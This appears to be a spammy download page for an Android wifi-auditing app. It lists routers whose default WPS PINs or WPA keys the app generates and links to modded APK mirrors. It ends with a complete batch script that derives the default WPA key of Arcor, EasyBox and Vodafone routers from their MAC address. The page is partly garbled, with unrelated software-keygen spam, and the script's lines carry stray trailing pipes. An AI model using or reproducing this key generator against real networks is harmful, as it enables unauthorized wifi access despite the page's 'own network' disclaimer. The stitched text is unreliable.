WifiAccess WPS WPA WPA2 Try Wifi Access to check the security level of your network. The difference between this application and WPSP in Generator is not allowing brute force attacks for WPS pin or cracking WPA hand shake. Without ROOT permissions:
– Audit networks generating default passphrase
– Receive wifi passwords from another phone (using WifiAccess orWeb Browser)
With ROOT permissions:
– Audit networks generating default WPS PIN. (Get any passphrase ifthe PIN is correct)
– Create wifi networks backup (incremental)
– Share wifi passwords from Android to another devices (Computer,Android, etc)
Free stata 12 keygen; Easybox wpa key generator. Router keygen para wpa wpa2 psk; Serial Gta 4 Keygen. Photoshop cs2 keygen for mac. EasyBox Standard WPA2 Key Generator ZynOS. Dll Acid pro 7 free download and keygen photoshop cs3 tutorials pdf windows. 7 free download windows adobe flash cs6. Conservation patch placement cub scout.
You must have a rooted device before you can use thisapplication. By the help of this application, you can see what ROOT means, how to root a device, the risks of rooting your Android, etc
Its functions are:
Supported networks (routers) and implemented algorithms:
Argentina
WiFi-Arnet-XXXX
Portugal
ADSLPT-ABXXXXX
Spain
VodafoneXXXX (WPS PIN y EasyBox generator)
ONOXXXX (WPS PIN)
Orange-XXXX (WPS PIN EasyBox generator PIN)
FTE-XXXX (WPS PIN FTE generator PIN)
WLAN_XXXX (WPS PIN y WPAMagicKey y WPSPin generator)
WLANXXXXXX (wlan4xx)
WiFiXXXXXX (wlan4xx)
YacomXXXXXX (wlan4xx)
ADB/Telekom – In progress
Arcadyan (WPA default keygen) compatible con:
– Arcor
– EasyBox
– Vodafone
– WLAN XXXXXX
WPS PIN DLink
Germany
Alicebox 1121 – Siemens S1621-Z220-A – In progress
Italia
PIRELLI Alice – In progress
Mexico
Huawei (mac2wpakey)
ARRIS (WPS Pin) -> SSID: HOME-XXXX, ARRIS-XXXX
Austria
Telekom (mac2wpakey)
Others
FastWeb Routers Wi-Fi – In progress
TouchStone Arris DG860A (WPS PIN)
Belkin (WPS PIN)
WPS PIN genérico (Nuevo – France y Turkey)
DSL-XXXXX 300Mbps
TPLink
Zyxel
Everest SG-XXXX
Huawei HG253
Lokum
ZXV10
Huawei Turkey
Work in progress: PixieWPS on Android
Terms and conditions of use
1 You must accept the terms before using this application.
1.1 This tool has been created in order to help you to check the security level of your own wireless network. It’s strictly for bidden to use this tool to decrypt foreign networks withou towner’s permission.
1.2 You agree to use this application only for lawful purposes in accordance with the laws and exclusively for the purposes described in (1.1).
1.3 Important: As the creator of this tool i’m not responsiblefor any misuse of it.
1.4 You will not manipulate and/or spreading the source code ofthis application.
Privacy Policy
This software uses the wireless adapter of the device to displayor change its status according to the orders received by theuser:
– Scan wireless networks
– Show all scanned networks
– Recover wireless stored passwords on the device
– Download and read the database of known networks
All information to which access this application does not leavethe device in any case.
Screenshots
Downloads
WifiAccess WPS WPA WPA2 v2.7 b28 [Mod] / Mirror
WifiAccess WPS WPA WPA2 v2.7 [MOD] / Mirror
@echo off & setlocal enabledelayedexpansion |
echo ####### Arcor/EasyBox WPA-Key Generator ####### |
echo .: script by :. |
echo...::: crazyjunkie :::... |
echo Use this only on your own Mac! |
echo. |
set /p macu=Bitte geben Sie die MAC ein: |
set mac=!macu::=! |
set mac=!mac:-=! |
set m9=!mac:~8,1! |
set m10=!mac:~9,1! |
set m11=!mac:~10,1! |
set m12=!mac:~11,1! |
set /a smac=0x!m9!!m10!!m11!!m12! |
if !smac! lss 10 ( |
(set smac=0000) |
) else ( |
if !smac! lss 100 ( |
(set smac=000!smac!) |
) else ( |
if !smac! lss 1000 ( |
(set smac=00!smac!) |
) else ( |
if !smac! lss 10000 ( |
(set smac=0!smac!) |
)))) |
set s6=!smac:~0,1! |
set s7=!smac:~1,1! |
set s8=!smac:~2,1! |
set s9=!smac:~3,1! |
set s10=!smac:~4,1! |
set smac=%s6%%s7%%s8%%s9%%s10% |
set /a k1=s7+s8+0x!m11!+0x!m12! |
set dec=!k1! |
call :dectohex |
set k1=0x!hex! |
set /a k2=s9+s10+0x!m9!+0x!m10! |
set dec=!k2! |
call :dectohex |
set k2=0x!hex! |
set /a x1='k1^s10' |
set dec=!x1! |
call :dectohex |
set x1=!hex! |
set /a x2='k1^s9' |
set dec=!x2! |
call :dectohex |
set x2=!hex! |
set /a x3='k1^s8' |
set dec=!x3! |
call :dectohex |
set x3=!hex! |
set /a y1='k2^^0x!m10!' |
set dec=!y1! |
call :dectohex |
set y1=!hex! |
set /a y2='k2^^0x!m11!' |
set dec=!y2! |
call :dectohex |
set y2=!hex! |
set /a y3='k2^^0x!m12!' |
set dec=!y3! |
call :dectohex |
set y3=!hex! |
set /a z1='0x!m11!^^s10' |
set dec=!z1! |
call :dectohex |
set z1=!hex! |
set /a z2='0x!m12!^^s9' |
set dec=!z2! |
call :dectohex |
set z2=!hex! |
set /a z3='k1^k2' |
set dec=!z3! |
call :dectohex |
set z3=!hex! |
set key=!x1!!y1!!z1!!x2!!y2!!z2!!x3!!y3!!z3! |
echo. |
echo MAC: %macu% |
echo SSID: EasyBox-%mac:~6,4%%s6%%s10% |
echo SSID: Arcor-%mac:~6,4%%s6%%s10% |
echo SSID: Vodafone-%mac:~6,4%%s6%%s10% |
echo SMAC: %smac% |
echo K1: %K1% |
echo K2: %K2% |
echo WPA-KEY: %key% |
echo. |
pause |
:dectohex |
set 'hex=' |
set 'map=0123456789ABCDEF' |
for /L %%N in (1,1,1) do ( |
set /a 'd=dec&15,dec>>=4' |
for %%D in (!d!) do set 'hex=!map:~%%D,1!!hex!' |
) |
set 'dec=' |